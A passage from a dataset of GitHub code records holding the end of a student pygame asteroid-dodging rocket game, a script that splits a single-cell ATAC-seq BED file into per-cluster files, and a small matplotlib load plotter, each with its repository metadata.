10)\nObs24 = Asteroid1(ast, 10, 10)\nObs25 = Asteroid1(ast, 10, 10)\nObs26 = Asteroid1(ast, 10, 10)\nObs27 = Asteroid1(ast, 10, 10)\nObs28 = Asteroid1(ast, 10, 10)\nObs29 = Asteroid1(ast, 10, 10)\nObs30 = Asteroid1(ast, 10, 10)\nObs31 = Asteroid1(ast, 10, 10)\nObs32 = Asteroid1(ast, 10, 10)\nObs33 = Asteroid1(ast, 10, 10)\nObs34 = Asteroid1(ast, 10, 10)\nObs35 = Asteroid1(ast, 10, 10)\nObs36 = Asteroid1(ast, 10, 10)\nObs37 = Asteroid1(ast, 10, 10)\nObs38 = Asteroid1(ast, 10, 10)\nObs39 = Asteroid1(ast, 10, 10)\nObs40 = Asteroid1(ast, 10, 10)\nObs41 = Asteroid1(ast, 10, 10)\nObs42 = Asteroid1(ast, 10, 10)\nObs43 = Asteroid1(ast, 10, 10)\nObs44 = Asteroid1(ast, 10, 10)\nObs45 = Asteroid1(ast, 10, 10)\nObs46 = Asteroid1(ast, 10, 10)\n\nASTEROID_sprites_lists.add(Obs,Obs1,Obs2,Obs3,Obs4,Obs5,Obs6,Obs7,Obs8,Obs9,Obs10,Obs11,Obs12,Obs13,Obs14,Obs15,Obs16,Obs17,Obs18,Obs19,Obs20,Obs21,Obs22,Obs23,Obs24,Obs25,Obs26,Obs27,Obs28,Obs29,Obs30,Obs31,Obs32,Obs33,Obs34,Obs35,Obs36,Obs37,Obs38,Obs39,Obs40,Obs41,Obs42,Obs43,Obs44,Obs45,Obs46)\n\n\n\nROCKET_sprites_lists = pygame.sprite.Group()\nplayer = Rocket(RocketImage,1,1,5,0,5)\nplayer.rect.x = 460\nplayer.rect.y = 400\nROCKET_sprites_lists.add(player)\n\nWorm_sprites_lists = pygame.sprite.Group()\nWorm2 = WormHole(wormhole1,70,70)\nWorm2.rect.x = 315\nWorm2.rect.y = 135\nWorm_sprites_lists.add(Worm2)\n \npygame.mixer.pre_init(frequency=44100, size=-16, channels=2, buffer=4096)\npygame.mixer.music.load(\"12. Marvin Gaye & Tammi Terrell - Ain't No Mountain High Enough.mp3\")\npygame.mixer.music.play(-1)\n\neffect = pygame.mixer.Sound('Rocket Thrusters-SoundBible.com-1432176431.wav')\n\nclass Button():\n \"\"\"This is a class for a generic button.\n \n txt = text on the button\n location = (x,y) coordinates of the button's centre\n action = name of function to run when button is pressed\n bg = background colour (default is white)\n fg = text colour (default is black)\n size = (width, height) of button\n font_name = name of font\n font_size = size of font\n \"\"\"\n def __init__(self, txt, location, action, bg=WHITE, fg=BLACK, size=(100, 40), font_name=\"Segoe Print\", font_size=16):\n self.color = bg \n self.bg = bg \n self.fg = fg \n self.size = size\n\n self.font = pygame.font.SysFont(font_name, font_size)\n self.txt = txt\n self.txt_surf = self.font.render(self.txt, 1, self.fg)\n self.txt_rect = self.txt_surf.get_rect(center=[s//2 for s in self.size])\n self.surface = pygame.surface.Surface(size)\n self.rect = self.surface.get_rect(center=location)\n\n self.call_back_ = action\n\n def draw(self):\n self.mouseover()\n\n self.surface.fill(self.bg)\n self.surface.blit(self.txt_surf, self.txt_rect)\n screen.blit(self.surface, self.rect)\n\n def mouseover(self):\n \"\"\"Checks if mouse is over button using rect collision\"\"\"\n self.bg = self.color\n pos = pygame.mouse.get_pos()\n if self.rect.collidepoint(pos):\n self.bg = BRIGHT_RED\n\n def call_back(self):\n \"\"\"Runs a function when clicked\"\"\"\n self.call_back_()\n \ndef my_shell_function():\n \"\"\"A generic function that prints something in the shell\"\"\"\n print('Fire the nukes!')\n\ndef my_next_function():\n \"\"\"A function that advances to the next level\"\"\"\n global level\n level += 1\n\ndef my_play():\n global level\n level += 2\n stop_music()\n \ndef my_INSTRUCTIONS():\n global level\n level += 3\n\ndef my_next_level():\n global level\n if level == 3:\n level += 2\n else:\n level += 1\n \ndef my_previous_function():\n \"\"\"A function that retreats to the previous level\"\"\"\n bg = RED\n global level\n if level == 3:\n level -=2\n elif level == 4:\n level -=3\n \n elif level == 5:\n level -=4\n else:\n level -= 1\n\ndef my_quit_function():\n \"\"\"A function that will quit the game and close the pygame window\"\"\"\n pygame.quit()\n sys.exit()\n\ndef mousebuttondown(level):\n \"\"\"A function that checks which button was pressed\"\"\"\n pos = pygame.mouse.get_pos()\n if level == 1:\n for button in level1_buttons:\n if button.rect.collidepoint(pos):\n button.call_back()\n elif level == 2:\n for button in level2_buttons:\n if button.rect.collidepoint(pos):\n button.call_back()\n elif level == 3:\n for button in level3_buttons:\n if button.rect.collidepoint(pos):\n button.call_back()\n elif level == 4:\n for button in level4_buttons:\n if button.rect.collidepoint(pos):\n button.call_back()\n elif level == 5:\n for button in level5_buttons:\n if button.rect.collidepoint(pos):\n button.call_back()\n \ndef play_music():\n pygame.mixer.music.unpause()\ndef stop_music():\n pygame.mixer.music.pause()\n\nlevel = 1\ncarryOn = True\nclock = pygame.time.Clock()\n\n\nfontTitle = pygame.font.Font('freesansbold.ttf', 50)\ntextSurfaceTitle = fontTitle.render('MQ Enterprise!', True, WHITE) \ntextRectTitle = textSurfaceTitle.get_rect()\ntextRectTitle.center = (400,50) \n\n\n\nbutton_PLAY = Button(\"PLAY\", (SCREENWIDTH/6, SCREENHEIGHT/4-50),my_play, bg=RED)\nbutton_INSTRUCTIONS = Button(\"INSTRUCTIONS\",(SCREENWIDTH/6, SCREENHEIGHT*2/4-50),my_INSTRUCTIONS, bg=RED, font_size = 12)\nbutton_SETTINGS = Button(\"SOUND\", (SCREENWIDTH/6, SCREENHEIGHT*3/4-50),my_next_function, bg=RED)\nbutton_QUIT = Button(\"QUIT\", (SCREENWIDTH/6, SCREENHEIGHT*4/4-50), my_quit_function, bg=RED)\nbutton_ON = Button(\"ON\", (SCREENWIDTH/5, SCREENHEIGHT/4), play_music,bg=RED)\nbutton_OFF= Button(\"OFF\", (SCREENWIDTH/5, SCREENHEIGHT*2/4),stop_music, bg=RED)\nbutton_Previous2 = Button(\"Previous\", (SCREENWIDTH/5, SCREENHEIGHT*3/4), my_previous_function,bg=RED)\n\n#arrange button groups depending on level\nlevel1_buttons = [button_PLAY,button_INSTRUCTIONS,button_SETTINGS, button_QUIT]\nlevel2_buttons = [button_ON,button_OFF,button_Previous2]\nlevel4_buttons = [button_Previous2]\n#---------Main Program Loop----------\n\nwhile carryOn:\n # --- Main event loop ---\n for event in pygame.event.get(): # Player did something\n if event.type == pygame.QUIT: # Player clicked close button\n carryOn = False\n elif event.type == pygame.MOUSEBUTTONDOWN: # Player clicked the mouse\n mousebuttondown(level)\n \n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n player.rotLeft()\n if keys[pygame.K_RIGHT]:\n player.rotRight()\n if keys[pygame.K_UP]:\n effect.play()\n player.Thurst(2)\n if keys[pygame.K_DOWN]:\n player.moveBackward(1)\n \n if player.rect.x < 0 or player.rect.x > SCREENWIDTH and player.rect.y < 0 or player.rect.y > SCREENHEIGHT:\n player.rect.x = 460\n player.rect.y = 400\n player.speed = 0\n hits = pygame.sprite.spritecollide(player, ASTEROID_sprites_lists, False, pygame.sprite.collide_circle_ratio(0.95))\n Win = pygame.sprite.spritecollide(player, Worm_sprites_lists, False, pygame.sprite.collide_circle_ratio(0.95))\n if hits:\n level = 6\n print(\"you crashed\")\n #carryOn = False\n elif Win:\n level == 1\n print(\"You Won!\")\n carryOn = False\n\n my_next_level()\n \n player.reset()\n\n player.rect.x = 680\n player.rect.y = 450\n print(\"You won\")\n carryOn = True\n \n \n # --- Game logic goes here\n player.update()\n\n # --- Draw code goes here\n screen.fill(WHITE)\n screen.fill(BLACK)\n screen.blit(starbg,(0,0))\n screen.blit(background, (0, 0))\n screen.blit(Rocketbg, (300,50))\n screen.blit(textSurfaceTitle,textRectTitle)\n\n # Draw buttons\n \n if level == 1: #main screen\n for button in level1_buttons:\n button.draw()\n \n elif level == 2: #settings\n screen.fill(WHITE)\n screen.blit(soundbg,(0,0))\n for button in level2_buttons:\n button.draw()\n \n elif level == 3: #game\n screen.blit(starbg,(0,0))\n ROCKET_sprites_lists.draw(screen)\n Obs.rect.x = 500\n Obs.rect.y = 380\n\n Obs1.rect.x =500\n Obs1.rect.y =300\n\n Obs2.rect.x =480\n Obs2.rect.y =260\n\n Obs3.rect.x =400\n Obs3.rect.y =300\n\n Obs4.rect.x =400\n Obs4.rect.y =380\n\n Obs5.rect.x =380\n Obs5.rect.y =270\n\n Obs6.rect.x =360\n Obs6.rect.y =230\n\n Obs7.rect.x =320\n Obs7.rect.y =200\n\n Obs8.rect.x =430\n Obs8.rect.y =200\n\n\n Obs9.rect.x =410\n Obs9.rect.y =170\n\n\n Obs10.rect.x =380\n Obs10.rect.y =140\n\n ASTEROID_sprites_lists.draw(screen)\n Worm_sprites_lists.draw(screen)\n \n elif level == 4: #instructions\n screen.blit(instrbg,(0,0))\n screen.blit(aa,(20,220))\n for button in level4_buttons:\n button.draw()\n font = pygame.font.Font('freesansbold.ttf', 30)\n text1 = font.render('INSTRUCTIONS',1,WHITE)\n screen.blit(text1,(300,20))\n \n font2 = pygame.font.Font('freesansbold.ttf', 20)\n text2 = font2.render('In this game the objective is to reach the wormhole',1,WHITE)\n screen.blit(text2,(20,100))\n \n text3 = font2.render('that is surrounded by orbiting meteorids. The player must follow',1,WHITE)\n screen.blit(text3,(20,130))\n\n text4 = font2.render('the designated path without touching the meteorids. If the players rocket',1,WHITE)\n screen.blit(text4,(20,160))\n\n text5 = font2.render('touches the path or the meteorids they will have to restart from the beginning',1,WHITE)\n screen.blit(text5,(20,190))\n\n text6 = font2.render('Top arrow key is thrust',1,WHITE)\n screen.blit(text6,(300,250))\n\n text7 = font2.render('Down arrow key moves rocket backwards',1,WHITE)\n screen.blit(text7,(300,275))\n\n text8 = font2.render('Right arrow key rotates rocket to the right',1,WHITE)\n screen.blit(text8,(300,300))\n\n text9 = font2.render('Left arrow key rotates the rocket to the left',1,WHITE)\n screen.blit(text9,(300,325))\n\n\n elif level == 5: #second level\n screen.blit(starbg,(0,0))\n ROCKET_sprites_lists.draw(screen)\n \n Obs.rect.x = 240\n Obs.rect.y = 210\n\n Obs1.rect.x = 50\n Obs1.rect.y = 200\n\n Obs2.rect.x =40\n Obs2.rect.y =245\n\n Obs3.rect.x =75\n Obs3.rect.y =175\n\n Obs4.rect.x = 110\n Obs4.rect.y = 150\n\n Obs5.rect.x =380\n Obs5.rect.y =180\n\n Obs6.rect.x =320\n Obs6.rect.y =200\n\n Obs7.rect.x =280\n Obs7.rect.y =200\n\n Obs8.rect.x =220\n Obs8.rect.y =180\n\n Obs9.rect.x = 725\n Obs9.rect.y = 410\n \n Obs10.rect.x =700\n Obs10.rect.y =375\n\n Obs11.rect.x =670\n Obs11.rect.y =340\n\n Obs12.rect.x = 740\n Obs12.rect.y = 450\n\n Obs13.rect.x = 580\n Obs13.rect.y = 460\n\n Obs14.rect.x = 540\n Obs14.rect.y = 430\n\n Obs15.rect.x = 500\n Obs15.rect.y = 405\n \n Obs16.rect.x = 460\n Obs16.rect.y = 375\n\n Obs17.rect.x = 420\n Obs17.rect.y = 350\n\n Obs18.rect.x = 380\n Obs18.rect.y = 325\n\n Obs19.rect.x = 340\n Obs19.rect.y = 300\n\n Obs20.rect.x = 300\n Obs20.rect.y = 285\n\n Obs21.rect.x = 260\n Obs21.rect.y = 300\n\n Obs22.rect.x = 220\n Obs22.rect.y = 340\n\n Obs23.rect.x = 180\n Obs23.rect.y = 375\n\n Obs24.rect.x = 140\n Obs24.rect.y = 380\n\n Obs25.rect.x = 100\n Obs25.rect.y = 360\n \n Obs26.rect.x = 60\n Obs26.rect.y = 340\n\n Obs27.rect.x = 20\n Obs27.rect.y = 315\n\n Obs28.rect.x = 20\n Obs28.rect.y = 285\n\n Obs29.rect.x = 425\n Obs29.rect.y = 200\n\n Obs30.rect.x = 460\n Obs30.rect.y = 225\n\n Obs31.rect.x = 500\n Obs31.rect.y = 250\n\n Obs32.rect.x = 540\n Obs32.rect.y = 275\n\n Obs33.rect.x = 580\n Obs33.rect.y = 300\n\n Obs34.rect.x = 620\n Obs34.rect.y = 325\n\n Obs35.rect.x = 200\n Obs35.rect.y = 235\n \n Obs36.rect.x = 350\n Obs36.rect.y = 200\n\n Obs37.rect.x = 160\n Obs37.rect.y = 245\n\n Obs38.rect.x = 160\n Obs38.rect.y = 130\n\n\n Obs39.rect.x = 200\n Obs39.rect.y = 115\n\n \n Obs40.rect.x = 230\n Obs40.rect.y = 100\n\n Obs41.rect.x = 270\n Obs41.rect.y = 100\n\n Obs42.rect.x = 310\n Obs42.rect.y = 90\n\n Obs43.rect.x = 350\n Obs43.rect.y = 100\n\n Obs44.rect.x = 385\n Obs44.rect.y = 115\n\n Obs45.rect.x = 380\n Obs45.rect.y = 140\n \n Obs46.rect.x = 430\n Obs46.rect.y = 250\n\n \n ASTEROID_sprites_lists.draw(screen)\n Worm_sprites_lists.draw(screen)\n\n elif level == 6:\n screen.fill(BLACK)\n font = pygame.font.Font('freesansbold.ttf', 50)\n text1 = font.render('GAME OVER',1,WHITE)\n screen.blit(text1,(250,200))\n \n # Update the screen with queued shapes\n pygame.display.flip()\n\n # --- Limit to 60 frames per second\n clock.tick(60)\n\npygame.quit()\n\n", "repo_name": "BrichtaICS3U/final-project-moaiz-qudrat", "sub_path": "game 1.py", "file_name": "game 1.py", "file_ext": "py", "file_size_in_byte": 15292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Asteroid.Asteroid1", "line_number": 41, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 42, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 43, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 44, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 45, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 46, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 47, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 48, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 49, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 50, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 51, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 52, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 53, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 54, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 55, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 56, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 57, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 58, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 59, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 60, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 61, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 62, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 63, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 64, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 65, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 66, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 67, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 68, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 69, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 70, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 71, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 72, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 73, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 74, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 75, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 76, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 77, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 78, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 79, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 80, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 81, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 82, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 83, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 84, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 85, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 86, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 93, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 93, "usage_type": "attribute"}, {"api_name": "rocketclass.Rocket", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 99, "usage_type": "attribute"}, {"api_name": "Worm.WormHole", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.mixer.pre_init", "line_number": 105, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 106, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 109, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 109, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 129, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pygame.surface.Surface", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.surface", "line_number": 133, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 148, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 197, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 198, "usage_type": "call"}, {"api_name": "pygame.mouse.get_pos", "line_number": 202, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 202, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.unpause", "line_number": 225, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 225, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.pause", "line_number": 227, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 227, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 231, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 234, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 234, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 257, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 257, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 258, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 260, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 263, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 263, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 264, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 266, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 268, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 278, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 278, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_circle_ratio", "line_number": 278, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 279, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 279, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_circle_ratio", "line_number": 279, "usage_type": "call"}, {"api_name": "pygame.font.Font", "line_number": 368, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 368, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 372, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 372, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 551, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 551, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 556, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 556, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 561, "usage_type": "call"}]} +{"seq_id": "33516537711", "text": "#! /usr/bin/env python\n\n#Author: Timothy Durham (c) 2018\n\nimport argparse\nimport numpy\nimport os\nfrom plumbum import local\nimport sys\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--cell_name_to_cluster_map')\n parser.add_argument('--cuts_bed_file')\n parser.add_argument('--out_dir')\n args = parser.parse_args()\n\n #get cell names for each cluster\n cluster_map = numpy.loadtxt(args.cell_name_to_cluster_map, delimiter='\\t', dtype=object)\n for clust_num in set(cluster_map[:,1]):\n clust_out_dir = os.path.join(args.out_dir, clust_num)\n if not os.path.isdir(clust_out_dir):\n os.makedirs(clust_out_dir)\n with open(os.path.join(clust_out_dir, '{!s}.indextable.txt'.format(clust_num)), 'w') as out:\n out.write('\\n'.join(['\\t'.join(cluster_map[idx]) for idx in numpy.where(cluster_map[:,1] == clust_num)[0]]) + '\\n')\n cell_names_to_clusters = dict([tuple(cluster_map[idx]) for idx in range(cluster_map.shape[0])])\n\n# with open(args.cell_name_to_cluster_map) as map_in:\n# cell_names_to_clusters = dict([(elt.strip().split()[0], \n# elt.strip().split()[1]) for elt in map_in])\n\n #parse bam file to make per-cluster bam files\n total_cuts_bed = args.cuts_bed_file\n out_dir = args.out_dir\n if not os.path.isdir(out_dir):\n os.makedirs(out_dir)\n\n bed_paths = {elt:os.path.join(out_dir, elt, '{!s}.cuts.bed'.format(elt)) for elt in set(cell_names_to_clusters.values())}\n bed_files = {}\n for elt, path in bed_paths.items():\n if not os.path.isdir(os.path.dirname(path)):\n os.makedirs(os.path.dirname(path))\n bed_files[elt] = open(path, 'w')\n# bed_files = {elt:open(path, 'w') for elt,path in bed_paths.items()}\n not_assignable_path = os.path.join(out_dir, 'unassignable.cuts.bed')\n not_assignable = open(not_assignable_path, 'w')\n with open(total_cuts_bed) as lines_in:\n for idx, line in enumerate(lines_in):\n if idx and not idx % 500000:\n sys.stdout.write('Processed {!s} BED records.\\n'.format(idx))\n sys.stdout.flush()\n cell_id = line.split()[3].split(':')[0]\n try:\n bed_files[cell_names_to_clusters[cell_id]].write(line)\n except KeyError:\n not_assignable.write(line)\n sys.stdout.write('Processed {!s} BED records.\\n'.format(idx))\n sys.stdout.flush()\n not_assignable.close()\n for bed in bed_files.values(): \n bed.close()\n\n sys.stdout.write('Splitting BED file complete.\\n')\n sys.stdout.flush()\n", "repo_name": "tdurham86/L2_sci-ATAC-seq", "sub_path": "scripts/lda_clustering/split_bed_script.py", "file_name": "split_bed_script.py", "file_ext": "py", "file_size_in_byte": 2638, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 41, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 51, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 58, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 58, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 63, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 63, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 64, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 64, "usage_type": "attribute"}]} +{"seq_id": "40355077233", "text": "from matplotlib import pyplot as plt\n\n\ndef main():\n timestamps = []\n avgs = []\n exps = []\n loads = []\n with open('output.txt', 'rb') as f:\n lines = f.readlines()\n for line in lines:\n timestamp, avg, exp, load = line.split()\n timestamps.append(int(timestamp))\n avgs.append(float(avg))\n exps.append(float(exp))\n loads.append(float(load))\n plt.plot(timestamps, loads)\n plt.plot(timestamps, avgs)\n plt.plot(timestamps, exps)\n plt.show()\n\nif __name__ == \"__main__\":\n main()", "repo_name": "EfficientAI/efficient_cv", "sub_path": "native/all_load_tracking/plotter.py", "file_name": "plotter.py", "file_ext": "py", "file_size_in_byte": 567, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.plot", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "29807345311", "text": "\"\"\"Inherited from 